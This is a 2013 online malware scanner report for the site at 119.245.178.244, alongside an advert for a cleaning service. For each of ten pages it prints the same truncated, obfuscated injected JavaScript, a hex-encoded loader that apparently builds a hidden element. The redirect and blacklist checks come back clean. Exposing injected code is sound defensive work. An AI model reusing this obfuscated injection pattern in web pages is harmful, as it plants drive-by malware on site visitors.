Online Malware Scanner report for 119.245.178.244
Website Malware
Cleaning & Monitoring
Malware cleaning service from eVuln team.
- Website cleaning
- Redirects removal
- Log files inspection
- Reason eliminating
- Blacklists removal
- One year monitoring
- Repeated fixing
$119.00
119.245.178.244
(cached results from Sat Apr 13 07:32:34 2013 rescan)
- Malicious/Suspicious/Total urls checked
- 10/0/10
10 pages have malicious code. See details below
- Blacklists
- OK
- Malicious redirects
- OK
- Malicious/Hidden/Total iFrames
- 0/0/0
- Deface / Content modification
- OK
Free daily monitoring of 119.245.178.244
Scanned pages/files
Request | Server response | Status |
http://119.245.178.244/ | 200 OK Content-Length: 11640 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/index.html | 200 OK Content-Length: 11640 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/greetings.html | 200 OK Content-Length: 12782 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/profile.html | 200 OK Content-Length: 9961 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/service.html | 200 OK Content-Length: 13254 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/questions.html | 200 OK Content-Length: 9126 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/contact.html | 200 OK Content-Length: 8377 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/india consulting.html | 200 OK Content-Length: 10322 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/overseasPJ01.html | 200 OK Content-Length: 10065 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
| ||
http://119.245.178.244/overseasPJ02.html | 200 OK Content-Length: 9442 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6c,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62 ...[2065 bytes skipped]... Antivirus reports:
|
Malicious redirects
First query (normal visit):
GET / HTTP/1.1
Host: 119.245.178.244
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Apr 2013 04:32:34 GMT
Accept-Ranges: bytes
ETag: "60136d61-2d78-4da2f657f4400"
Server: Apache
Content-Length: 11640
Content-Type: text/html
Last-Modified: Fri, 12 Apr 2013 20:03:28 GMT
...11640 bytes of data.
GET / HTTP/1.1
Host: 119.245.178.244
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Apr 2013 04:32:34 GMT
Accept-Ranges: bytes
ETag: "60136d61-2d78-4da2f657f4400"
Server: Apache
Content-Length: 11640
Content-Type: text/html
Last-Modified: Fri, 12 Apr 2013 20:03:28 GMT
...11640 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 119.245.178.244
Referer: http://www.google.com/search?q=119.245.178.244
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 119.245.178.244
Referer: http://www.google.com/search?q=119.245.178.244
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=119.245.178.244
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.ru/infected?l10n=en&url=http://119.245.178.244/
Result: 119.245.178.244 is not infected or malware details are not published yet.
Result: 119.245.178.244 is not infected or malware details are not published yet.